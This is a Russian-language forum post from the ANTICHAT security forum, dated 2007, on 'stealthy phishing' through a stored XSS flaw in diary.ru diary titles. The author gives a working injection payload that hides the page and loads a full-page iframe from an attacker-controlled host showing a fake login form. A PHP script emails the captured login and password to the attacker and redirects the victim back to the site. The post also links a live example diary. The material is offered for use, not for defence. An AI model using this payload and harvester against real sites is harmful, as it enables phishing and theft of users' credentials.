ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.09.2007, 21:49
|
|
Познающий
Регистрация: 30.12.2006
Сообщений: 32
Провел на форуме:
383436
Репутация:
68
|
|
Беспалевный фишинг
Добрый вечер, с вами XenOtai.
Если вы внимательно следите за темой активных хсс, то наверняка видели найденную мной активку на diary.ru. Напомню, что находится она в названии дневника. Положим, вы украли куки, но Вам хочется большего. То есть пароля.
Но что, если он сложный и расшифровать его не удалось? Тогда первый выход, который приходит в голову – фишинг. Сделать фальшивую авторизацию, и как только чел зайдёт на свой дневник, его переадресует на сделанную нами форму.
Одна проблемка – адрес-то в адресной строке сменится на другой, пусть и похожий. Вы наверняка задавались вопросом, как же этого можно избежать.
Итак, заходим на дайри. Вбиваем <xss> в название дневника, бежим смотреть исходник – действительно, фильтрации 0. При этом наш тег выводится в параметре title:
Код:
<title>@дневники — <xss></title>
Итак, что нам надо осуществить? Нам нужно:
А) Фрейм в теле страницы.
Б) Скрыть всё лишнее.
Как скрыть лишнее? Оч просто:
Код:
<body style="visibility:hidden;">
Так как даже если посередине страницы поставить </body></html>, браузер всё равно отображает дальше, но учитывает параметры, различные в каждом теге, то наш стиль прекрасненько отобразиться! Теперь фрейм! Обычный фрейм не годится, поскольку он исчезнет вместе с боди, нам нужен iframe.
Итак, финальный код:
Код HTML:
</title><iframe src=http://fuckinghack.ru/auth.html location=top width="1003" height="1800" hspace=0 vspace=0><body style="visibility:hidden;">
Подбираем ширину и высоту по нашей нужде, фрейм отображает страницу, которая отошлёт данные нашему скрипту, который, обработав их, отошлёт на нашу почту.
Для тех, кто в танке, код скрипта (кто-то выкладывал на ачате  ):
PHP код:
<?
$to = "hacker@hacker.ru" . ", " ; //ваше мыло
$subject = "Заход на diary.ru через ваш фейк"; //тема сообщения
$message = "Через ваш фейк на мыло зашли
Login: $login
Password: $passwd"; //само сообщение. Если хотите изменить, то только верхнюю строчку.
$otpravitel = "M@IL Corp <admin@win.mail.ru>";
$headers = "MIME-Version: 1.0";
$headers .= "Content-type: text/$tipe; charset=windows-1251";
$headers .= "From: $otpravitel";
mail($to, $subject, $message, $headers); //отправляем сообщение
header("Location: http://diary.ru");
//при правильном вводе пароля жертва будет переадресовываться на дайри, как будто ничего не было (хорошо бы устроить переадресацию на какой-нибудь дневник, потому что адресная строка останется прежней), но вам отправится пароль
exit;
?>
Чего мы достигли: Фейк на дневнике, с адресом дневника. Пример (оптимизировано под 1024х768):
Код:
http://diary.ru/~roboboy/
«Удачи мне надо бежать а то я всю ночь не спал то что говорит что я убежал спать». (с) Dracula4ever
XenOtai special for Antichat.ru |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид